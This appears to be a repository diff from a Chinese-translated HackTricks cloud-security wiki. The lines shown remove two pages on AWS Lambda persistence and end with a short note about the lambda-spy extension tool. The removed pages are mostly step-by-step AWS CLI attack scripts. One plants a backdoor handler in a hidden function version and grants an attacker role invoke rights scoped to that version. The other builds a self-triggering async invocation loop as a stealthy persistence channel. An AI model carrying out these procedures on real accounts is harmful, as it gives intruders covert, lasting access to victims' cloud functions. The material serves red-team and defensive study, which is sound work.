工具 [**lambda-spy**](https://github.com/clearvector/lambda-spy) 被创建用于执行 **内存写入** **窃取敏感信息**,从 lambda 请求、其他 **扩展** **请求** 甚至 **修改它们**
The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**.
## 参考文献
## References
- [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/)
- [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -1,88 +0,0 @@
# AWS - Lambda Alias-Scoped Resource Policy Backdoor (Invoke specific hidden version)
{{#include ../../../../banners/hacktricks-training.md}}
## 概述
使用带有攻击者逻辑的隐藏 Lambda 版本,并在 `lambda add-permission` 中使用 `--qualifier` 参数,将基于资源的策略限定到该特定版本(或别名)。仅向攻击者主体授予对 `arn:aws:lambda:REGION:ACCT:function:FN:VERSION``lambda:InvokeFunction` 权限。通过函数名或主别名的正常调用不受影响,而攻击者可以直接调用被植入后门的版本 ARN。
这比公开 Function URL 更隐蔽,并且不会更改主流量别名。
## 所需权限(攻击者)
- `lambda:UpdateFunctionCode`, `lambda:UpdateFunctionConfiguration`, `lambda:PublishVersion`, `lambda:GetFunctionConfiguration`
- `lambda:AddPermission` (to add version-scoped resource policy)
- `iam:CreateRole`, `iam:PutRolePolicy`, `iam:GetRole`, `sts:AssumeRole` (to simulate an attacker principal)
## 攻击步骤CLI
<details>
<summary>发布隐藏版本,添加 qualifier 范围的权限,并以攻击者身份调用</summary>
```bash
# Vars
REGION=us-east-1
TARGET_FN=<target-lambda-name>
# [Optional] If you want normal traffic unaffected, ensure a customer alias (e.g., "main") stays on a clean version
# aws lambda create-alias --function-name "$TARGET_FN" --name main --function-version <clean-version> --region "$REGION"
# 1) Build a small backdoor handler and publish as a new version
cat > bdoor.py <<PY
import json, os, boto3
def lambda_handler(e, c):
ident = boto3.client(sts).get_caller_identity()
return {"ht": True, "who": ident, "env": {"fn": os.getenv(AWS_LAMBDA_FUNCTION_NAME)}}
PY
zip bdoor.zip bdoor.py
aws lambda update-function-code --function-name "$TARGET_FN" --zip-file fileb://bdoor.zip --region $REGION
aws lambda update-function-configuration --function-name "$TARGET_FN" --handler bdoor.lambda_handler --region $REGION
until [ "$(aws lambda get-function-configuration --function-name "$TARGET_FN" --region $REGION --query LastUpdateStatus --output text)" = "Successful" ]; do sleep 2; done
VER=$(aws lambda publish-version --function-name "$TARGET_FN" --region $REGION --query Version --output text)
VER_ARN=$(aws lambda get-function --function-name "$TARGET_FN:$VER" --region $REGION --query Configuration.FunctionArn --output text)
echo "Published version: $VER ($VER_ARN)"
# 2) Create an attacker principal and allow only version invocation (same-account simulation)
ATTACK_ROLE_NAME=ht-version-invoker
aws iam create-role --role-name $ATTACK_ROLE_NAME --assume-role-policy-document Version:2012-10-17 >/dev/null
cat > /tmp/invoke-policy.json <<POL
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": ["lambda:InvokeFunction"],
"Resource": ["$VER_ARN"]
}]
}
POL
aws iam put-role-policy --role-name $ATTACK_ROLE_NAME --policy-name ht-invoke-version --policy-document file:///tmp/invoke-policy.json
# Add resource-based policy scoped to the version (Qualifier)
aws lambda add-permission \
--function-name "$TARGET_FN" \
--qualifier "$VER" \
--statement-id ht-version-backdoor \
--action lambda:InvokeFunction \
--principal arn:aws:iam::$(aws sts get-caller-identity --query Account --output text):role/$ATTACK_ROLE_NAME \
--region $REGION
# 3) Assume the attacker role and invoke only the qualified version
ATTACK_ROLE_ARN=arn:aws:iam::$(aws sts get-caller-identity --query Account --output text):role/$ATTACK_ROLE_NAME
CREDS=$(aws sts assume-role --role-arn "$ATTACK_ROLE_ARN" --role-session-name htInvoke --query Credentials --output json)
export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r .AccessKeyId)
export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r .SecretAccessKey)
export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r .SessionToken)
aws lambda invoke --function-name "$VER_ARN" /tmp/ver-out.json --region $REGION >/dev/null
cat /tmp/ver-out.json
# 4) Clean up backdoor (remove only the version-scoped statement). Optionally remove the role
aws lambda remove-permission --function-name "$TARGET_FN" --statement-id ht-version-backdoor --qualifier "$VER" --region $REGION || true
```
</details>
## 影响
- 授予一个隐蔽的后门,用于调用函数的隐藏版本,而无需修改主别名或暴露 Function URL。
- 通过基于资源的策略 `Qualifier`,将暴露限制为仅指定的版本/别名,降低检测面同时保留对攻击者主体的可靠调用。
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -1,95 +0,0 @@
# AWS - Lambda Async Self-Loop Persistence via Destinations + Recursion Allow
{{#include ../../../../banners/hacktricks-training.md}}
滥用 Lambda 的异步 destinations 并结合 Recursion 配置,使函数无需外部调度器(如 EventBridge、cron 等即可持续自我触发。默认情况下Lambda 会终止递归循环,但将 recursion 配置设为 Allow 可重新启用它们。Destinations 在服务端处理 async invokes因此一次初始 invoke 就能创建一个隐蔽、无代码的心跳/后门通道。可选地通过 reserved concurrency 限制节流,以降低噪音。
Notes
- Lambda 不允许直接将函数配置为其自身的 destination。使用 function alias 作为 destination并允许 execution role 调用该 alias。
- Minimum permissions: 能够读取/更新目标函数的 event invoke config 和 recursion config、发布 version 并管理 alias以及更新函数的 execution role policy 以允许 lambda:InvokeFunction 针对该 alias。
## 要求
- Region: us-east-1
- Vars:
- REGION=us-east-1
- TARGET_FN=<target-lambda-name>
## 步骤
1) 获取函数 ARN 和当前 recursion 配置
```
FN_ARN=$(aws lambda get-function --function-name "$TARGET_FN" --region $REGION --query Configuration.FunctionArn --output text)
aws lambda get-function-recursion-config --function-name "$TARGET_FN" --region $REGION || true
```
2) 发布一个版本并创建/更新一个 alias用作自引用目标
```
VER=$(aws lambda publish-version --function-name "$TARGET_FN" --region $REGION --query Version --output text)
if ! aws lambda get-alias --function-name "$TARGET_FN" --name loop --region $REGION >/dev/null 2>&1; then
aws lambda create-alias --function-name "$TARGET_FN" --name loop --function-version "$VER" --region $REGION
else
aws lambda update-alias --function-name "$TARGET_FN" --name loop --function-version "$VER" --region $REGION
fi
ALIAS_ARN=$(aws lambda get-alias --function-name "$TARGET_FN" --name loop --region $REGION --query AliasArn --output text)
```
3) 允许函数执行角色调用 alias由 Lambda Destinations→Lambda 要求)
```
# Set this to the execution role name used by the target function
ROLE_NAME=<lambda-execution-role-name>
cat > /tmp/invoke-self-policy.json <<EOF
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "lambda:InvokeFunction",
"Resource": "${ALIAS_ARN}"
}
]
}
EOF
aws iam put-role-policy --role-name "$ROLE_NAME" --policy-name allow-invoke-self --policy-document file:///tmp/invoke-self-policy.json --region $REGION
```
4) 将 async destination 配置为 alias (self via alias),并禁用重试
```
aws lambda put-function-event-invoke-config \
--function-name "$TARGET_FN" \
--destination-config OnSuccess={Destination=$ALIAS_ARN} \
--maximum-retry-attempts 0 \
--region $REGION
# Verify
aws lambda get-function-event-invoke-config --function-name "$TARGET_FN" --region $REGION --query DestinationConfig
```
5) 允许递归循环
```
aws lambda put-function-recursion-config --function-name "$TARGET_FN" --recursive-loop Allow --region $REGION
aws lambda get-function-recursion-config --function-name "$TARGET_FN" --region $REGION
```
6) 触发一个单次异步调用
```
aws lambda invoke --function-name "$TARGET_FN" --invocation-type Event /tmp/seed.json --region $REGION >/dev/null
```
7) 观察连续调用 (示例)
```
# Recent logs (if the function logs each run)
aws logs filter-log-events --log-group-name "/aws/lambda/$TARGET_FN" --limit 20 --region $REGION --query events[].timestamp --output text
# or check CloudWatch Metrics for Invocations increasing
```
8) 可选的隐蔽节流
```
aws lambda put-function-concurrency --function-name "$TARGET_FN" --reserved-concurrent-executions 1 --region $REGION
```
## 清理
中断 loop 并移除 persistence。
```
aws lambda put-function-recursion-config --function-name "$TARGET_FN" --recursive-loop Terminate --region $REGION
aws lambda delete-function-event-invoke-config --function-name "$TARGET_FN" --region $REGION || true
aws lambda delete-function-concurrency --function-name "$TARGET_FN" --region $REGION || true
# Optional: delete alias and remove the inline policy when finished
aws lambda delete-alias --function-name "$TARGET_FN" --name loop --region $REGION || true
ROLE_NAME=<lambda-execution-role-name>
aws iam delete-role-policy --role-name "$ROLE_NAME" --policy-name allow-invoke-self --region $REGION || true
```
## 影响
- 单次 async invoke 会导致 Lambda 在没有外部调度器的情况下不断自我调用,从而实现隐蔽的持久化/心跳。Reserved concurrency 可以将噪音限制为单个 warm execution。
{{#include ../../../../banners/hacktricks-training.md}}

Some files were not shown because too many files have changed in this diff Show More